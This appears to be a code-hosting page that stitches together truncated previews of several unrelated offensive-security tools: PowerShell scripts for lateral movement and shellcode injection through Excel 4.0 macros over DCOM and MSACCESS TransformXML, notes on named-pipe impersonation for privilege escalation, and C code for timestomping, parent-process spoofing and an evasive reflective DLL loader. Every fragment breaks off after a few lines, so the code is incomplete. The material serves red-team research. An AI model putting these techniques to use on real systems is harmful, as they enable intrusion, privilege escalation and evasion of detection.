This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<#
Lateral movement and shellcode injection via Excel 4.0 macros
Author: Philip Tsukerman (@PhilipTsukerman)
License: BSD 3-Clause
Based on Invoke-Excel4DCOM by Stan Hegt (@StanHacked) / Outflank - https://github.com/outflanknl/Excel4-DCOM
#>
function Invoke-ExShellcode
{
<#

#**********************************************************************
# Invoke-Excel4DCOM64.ps1
# Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, now with x64 support
# Author: Stan Hegt (@StanHacked) / Outflank, x64 support by Philip Tsukerman (@PhilipTsukerman) / Cybereason
# Date: 2019/04/21
# Version: 1.1
#**********************************************************************
function Invoke-Excel4DCOM
{

<#
Lateral Movement Via MSACCESS TransformXML
Author: Philip Tsukerman (@PhilipTsukerman)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
#>
function Invoke-AccessXSLT {
<#

/*
 * Great, this technique is overdone maybe...a billion times.
 * This same technique is used by Metasploit's getsystem()
 * command in implementation 1 (getsystem -t 1) by forcing
 * a service to connect to an arbitrary named pipe.
 *
 * The technique is abusable given the following conditions:
 * -> SeImpersonatePrivilege _must_ be enabled, I cannot stress
 *    this enough. Read MSDN: to impersonate other users, you need
 *    this privilege for the call to complete successfully.

// Demonstrates "timestomping" in C using Ntdll.dll function calls.
// Authored by Austin Hudson (Mumbai).
// Can be compiled with mingw:
// x86_64-w64-mingw32-gcc timestomp.c -o timestomp.exe -lntdll
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <winternl.h>
#include <ntstatus.h>
#include <stdio.h>

static int process_spoof(HANDLE ParentHandle, PCHAR ProcessName)
{
    SIZE_T ThreadSize;
    STARTUPINFOEXA si;
    PROCESS_INFORMATION pi;
    RtlSecureZeroMemory(&pi, sizeof(pi));
    RtlSecureZeroMemory(&si, sizeof(si));
    InitializeProcThreadAttributeList(NULL, 1, 0, &ThreadSize);
    si.lpAttributeList = reinterpret_cast<LPPROC_THREAD_ATTRIBUTE_LIST>(HeapAlloc(GetProcessHeap(),
                                                                                  HEAP_ZERO_MEMORY, ThreadSize));

/**
    loader.c - Attempts to fully port LoadLibrary() to a position-independent
               variation to facilitate the self-loading of a DLL and its
               dependencies, as well as introduce evasive features to reduce
               memory indicators.
    Inspiration:
        ZeroLoad - https://github.com/zerosum0x0/zeroload (zerosum0x0)
        MemoryModule - https://github.com/fancycode/MemoryModule (fancycode)

#include <windows.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>
#include <stdbool.h>
#if _WIN32 || _WIN64
#if _WIN64
typedef uint64_t uint_t;
#else

using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using System.Runtime.InteropServices;
using Microsoft.SqlServer.Server;
public partial class StoredProcedures
{

#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
struct s_config {